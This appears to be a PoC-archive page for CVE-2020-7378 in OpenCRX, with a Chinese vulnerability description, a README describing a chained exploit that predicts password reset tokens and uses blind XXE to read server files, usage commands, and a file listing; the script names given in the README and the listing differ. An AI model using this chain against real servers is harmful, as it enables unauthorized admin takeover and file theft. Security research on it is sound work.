CVE-2020-7378 PoC — Crixp Opencrx 授权问题漏洞

Source

https://github.com/loganpkinfosec/CVE-2020-7378

Associated Vulnerability

Title:Crixp Opencrx 授权问题漏洞 (CVE-2020-7378)
Description:Crixp Crixp Opencrx是瑞士Crixp公司的一款对销售过程进行管理的建站系统。该系统基于Java的客户端的Java API和兼容Swagger的RESTful API，可用于销售，服务，市场营销，联系中心和问题管理等场景。 CRIXP OpenCRX version 4.30版本及5.0-20200717之前版本存在安全漏洞，该漏洞源于存在未经验证的密码更改漏洞。攻击者可利用该漏洞可以将任何用户的密码(包括admin-Standard)更改为所选的任何值。

Readme

## CVE-2020-7378 – OpenCRX Predictable Password Reset Token and XXE Exploit

This repository contains a combined proof-of-concept (PoC) exploit for **CVE-2020-7378**, a critical vulnerability in **OpenCRX** (versions up to and including 5.0-20200717). The exploit chains two core issues in the application:

1. A **predictable password reset token** vulnerability due to reliance on `java.util.Random`, which allows attackers to generate valid tokens based on a millisecond timestamp seed.
2. A **blind XML External Entity (XXE)** vulnerability in the `RestServlet` endpoint that permits remote file disclosure from the server’s filesystem.

The combination of these two flaws enables an unauthenticated attacker to gain administrative access and exfiltrate sensitive server-side files.

---

### Vulnerability Details

* **CVE ID**: [CVE-2020-7378](https://nvd.nist.gov/vuln/detail/CVE-2020-7378)
* **Affected Product**: OpenCRX ≤ 5.0-20200717
* **Attack Surface**: Publicly exposed management and REST interfaces
* **Root Causes**:

  * Insecure pseudo-random token generation during password resets
  * Unsafe XML parsing in REST API endpoints
* **Impact**:

  * Unauthorized password resets for arbitrary users (including admin)
  * Arbitrary file read via XXE injection
* **CVSS**: 9.1 (Critical)

---

### Included Components

* `opencrx-exploit.py`: Full-chain exploit script that performs both token prediction and XXE file read.
* `OpenCRXToken.java`: Java class that emulates the token generation logic using a brute-force seed range based on request timing.







### Usage

1. Compile the token generator:

   ```bash
   javac OpenCRXToken.java
   ```

2. Run the exploit:

   ```bash
   python3 opencrx-exploit.py <target_user_id>
   ```

This will:

* Generate and test valid password reset tokens based on the timing window.
* Reset the target user’s password.
* Trigger an XXE payload via the REST API to read a sensitive file from the server.

File Snapshot


 [4.0K]  /data/pocs/c7648a99e1ce8c2e6afdd85ccf655173b583678c
├── [2.5K]  opencrx-reset-spray.py
├── [ 732]  OpenCRXToken.java
└── [1.9K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!